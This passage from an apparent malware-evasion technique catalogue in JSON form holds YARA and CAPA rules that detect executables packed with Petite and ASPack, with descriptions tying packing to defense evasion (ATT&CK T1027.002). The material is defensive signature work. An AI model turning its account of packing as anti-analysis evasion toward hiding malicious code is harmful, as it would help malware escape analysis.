42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 
00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 7B 00 00 00 85 C0 74 2E 5F 5F 58 5A 8B 4A 0C C1 F9 02 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB A0 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 6D 01 6A 10 8B D8 66 05 66 01 50 52 6A 00 8B 13 FF 14 1A 6A FF FF 93 ?? ?? 
00 00 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 
68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 192,
            "unprotect_id": "U1411",
            "name": "AsPack",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ASPack is an EXE packer created to compress Win32 executable files and to protect them against reverse engineering.\r\n\r\nIt makes Windows programs and libraries up to 70% smaller, which reduces the download time of compressed applications on local networks and the Internet compared to uncompressed ones.\r\n\r\nThe ASPack EXE compressor also protects programs and applications against unprofessional analysis, debuggers and decompilers.",
            "resources": "http://www.aspack.com/",
            "tags": "aspack",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 95,
                    "key": "capa_detect_aspack",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_ASPACK",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with ASPack\r\n    namespace: anti-analysis/packer/aspack\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - http://www.aspack.com/\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 2055994ff75b4309eee3a49c5749d306\r\n  features:\r\n    - or:\r\n      - section: .aspack\r\n      - section: .adata\r\n      - section: .ASPack\r\n      - section: ASPack\r\n      - string: \"The procedure entry point %s could not be located in the dynamic link library %s\"\r\n      - string: \"The ordinal %u could not be located in the dynamic link library %s\""
                },
                {
                    "id": 109,
                    "key": "yara_detect_aspack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Aspack",
                    "rule": "rule ASPack_v107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 }\r\n        $b = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPAck_1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 ?? ?? EB }\r\n        $b = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 00 00 75 15 FE 85 74 7C 43 00 E8 1D 00 00 00 E8 F7 01 00 00 E8 8E 02 00 00 8B 85 75 7C 43 00 03 85 89 7C 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D }\r\n        $b = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerAspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED CE 3A 44 00 B8 C8 3A 44 00 03 C5 2B 85 B5 3E 44 00 89 85 C1 3E 44 00 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASPack_212_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 
89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1083: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E 44 00 0F 85 17 05 00 00 8D 85 D1 50 44 00 50 FF 95 94 51 44 00 89 85 CD 50 44 00 8B F8 8D 9D DE 50 44 00 53 50 FF 95 90 51 44 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102a_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 ?? ?? 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 3D }\r\n        $b = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? 
}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v100b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? 
E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D B8 03 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 
80 BD 01 DE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_100b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 92 1A 44 00 B8 8C 1A 44 00 03 C5 2B 85 CD 1D 44 00 89 85 D9 1D 44 00 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 3E D9 43 B8 38 03 C5 2B 85 0B DE 43 89 85 17 DE 43 80 BD 01 DE 43 75 15 FE 85 01 DE 43 E8 1D E8 79 02 E8 12 03 8B }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 
0F B6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_104b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? 00 B8 ?? ?? ?? 00 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? 00 80 BD 08 9D ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_107b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED CE 3A 44 B8 C8 3A 44 03 C5 2B 85 B5 3E 44 89 85 C1 3E 44 80 BD AC 3E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_or_10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 01 ?? ?? ?? EB 5D BB ED FF FF FF 03 DD 81 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 59 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211c: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D }\r\n        $b = { 60 E8 02 00 00 00 EB 